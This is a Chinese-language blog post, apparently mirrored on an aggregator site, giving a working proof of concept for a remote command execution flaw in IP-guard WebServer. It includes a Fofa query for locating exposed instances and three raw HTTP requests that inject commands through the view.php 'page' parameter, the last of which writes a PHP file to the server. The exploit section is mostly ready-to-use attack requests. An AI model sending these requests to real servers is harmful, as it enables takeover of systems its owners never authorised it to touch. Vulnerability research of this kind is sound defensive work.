当前位置: 首页 > news >正文

IP-guard WebServer 远程命令执行漏洞

IP-guard WebServer 远程命令执行漏洞

  • 免责声明
  • 漏洞描述
  • 漏洞影响
  • 漏洞危害
  • 网络测绘
    • Fofa: app="ip-guard"
  • 漏洞复现
    • 1. 构造poc
    • 2. 访问文件
    • 3. 执行命令

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。

漏洞影响

IP-guard < 4.81.0307.0

漏洞危害

未经允许的攻击者可通过该漏洞执行操作系统命令,接管服务器。

网络测绘

Fofa: app=“ip-guard”

在这里插入图片描述
在这里插入图片描述

漏洞复现

1. 构造poc

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+123+>+test.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ipg_session=0vj0240xxxxxxxxn0ug6; PHPSESSID=dqmb1suxxxxxxxxxxa9fmk7tii
Upgrade-Insecure-Requests: 1

在这里插入图片描述

2. 访问文件

GET /ipg/static/appr/lib/flexpaper/php/test.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ipg_session=0vj0240nkri5qp27v40f6bj4getn0ug6; PHPSESSID=dqmb1suk7ci3te6rga9fmk7tii
Upgrade-Insecure-Requests: 1

在这里插入图片描述

3. 执行命令

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+^%3C?php+phpinfo();+?^%3E+%3Etest.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ipg_session=0vj0240nkrxxxxxxxetn0ug6; PHPSESSID=dqmb1suk7xxxxxxxxxxxxtii
Upgrade-Insecure-Requests: 1

在这里插入图片描述
在这里插入图片描述

http://www.lryc.cn/news/226439.html

相关文章:

  • 每次重启完IDEA,application.properties文件里的中文变成?
  • 【Truffle】四、通过Ganache部署连接
  • React 其他常用Hooks
  • 将 ONLYOFFICE 文档编辑器与 С# 群件平台集成
  • 使用电脑时提示msvcp140.dll丢失的5个解决方法
  • VR全景如何应用在房产行业,VR看房有哪些优势
  • 11月份 四川汽车托运报价已经上线
  • springcloud图书借阅管理系统源码
  • 主题模型LDA教程:LDA主题数选取:困惑度preplexing
  • Docker快速入门
  • 36 Gateway网关 快速入门
  • MyBatis的知识点和简单用法
  • KITTI数据集(.bin数据)转换为点云数据(.pcd文件)
  • 【电路笔记】-节点电压分析和网状电流分析
  • jenkins通知
  • 技术分享 | Spring Boot 异常处理
  • 【Python 千题 —— 基础篇】成绩评级
  • 【ARM Coresight OpenOCD 系列 2 -- OpenOCD 脚本语法详细介绍】
  • pytorch 初始化
  • process.env.XXX环境变量不生效的解决方法
  • QT项目|时间服务器架构
  • Java学习 10.Java-数组习题
  • Vue3使用vue-print-nb插件打印功能
  • Leetcode300 最长递增子序列
  • 2000-2022年上市公司数字化转型同群效应数据
  • Python 如何实践 Builder(生成器) 对象创建型设计模式?
  • 【Qt绘制小猪】以建造者模式绘制小猪
  • 开发中常用的SQL语句
  • Unreal UnLua + Lua Protobuf
  • java 类和对象 (图文搭配,万字详解!!)